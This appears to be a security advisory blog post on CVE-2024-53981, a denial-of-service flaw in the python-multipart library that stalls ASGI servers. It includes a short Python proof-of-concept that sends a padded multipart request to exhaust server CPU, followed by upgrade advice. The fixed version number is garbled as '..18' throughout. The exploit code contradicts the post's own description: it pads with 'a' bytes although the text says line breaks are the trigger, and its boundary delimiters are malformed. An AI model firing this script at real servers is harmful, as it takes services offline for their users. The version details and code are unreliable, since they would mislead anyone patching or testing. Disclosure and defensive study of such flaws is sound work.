A newly discovered vulnerability in the python-multipart library, identified as CVE-2024-53981, can lead to denial of service (DoS) in ASGI (Asynchronous Server Gateway Interface) applications when left unpatched. The vulnerability has been fixed in version ..18 of python-multipart. In this post, we discuss the details of this vulnerability, including an overview of python-multipart, how the vulnerability can be exploited, and how to mitigate the risk it poses.
Overview of Python-multipart
Python-multipart is a streaming multipart parser for Python, commonly used for parsing form data in web applications. It handles large file uploads efficiently because it parses data incrementally rather than loading the entire file into memory. More information about python-multipart can be found in its official repository on GitHub (https://github.com/andrew-d/python-multipart).
Vulnerability Details
When parsing form data, python-multipart skips line breaks (CR \r or LF \n) in front of the first boundary and any trailing bytes after the last boundary. It does this one byte at a time and emits a log event for every skipped byte. For certain inputs this results in excessive logging and CPU work in proportion to the number of stray bytes.
Attack Vector
An attacker exploits this by sending a malicious request containing a large amount of data placed either before the first boundary or after the last one. Skipping and logging those bytes one at a time causes high CPU load and effectively stalls the processing thread for an extended period. In an ASGI application this stalls the event loop and prevents other requests from being processed, resulting in a denial of service (DoS).
Exploit Code Snippet
import requests

url = "http://example.com/upload"
# Bytes placed before the first boundary; the vulnerable parser skips and logs them one at a time
data = b'a' * 100000
headers = {
    "Content-Type": "multipart/form-data; boundary=---1234---"
}
# Multipart body: the padding, then a single form part delimited by "--" + boundary
payload = data + b'\r\n-----1234-----\r\nContent-Disposition: form-data; name="file"; filename="test.txt"\r\n\r\nHello, World!\r\n-----1234-----\r\n'
response = requests.post(url, headers=headers, data=payload)
print(response.text)
Mitigation
To mitigate this issue, developers must update python-multipart to version ..18 or later. This can be done with pip, the Python package manager, by executing the following command:
pip install --upgrade python-multipart
Conclusion
In summary, CVE-2024-53981 poses a significant risk to ASGI applications, as an attacker can exploit it to cause a denial of service. To mitigate this risk, ensure that your application uses python-multipart version ..18 or later.
Timeline
Published on: 12/02/2024 16:15:14 UTC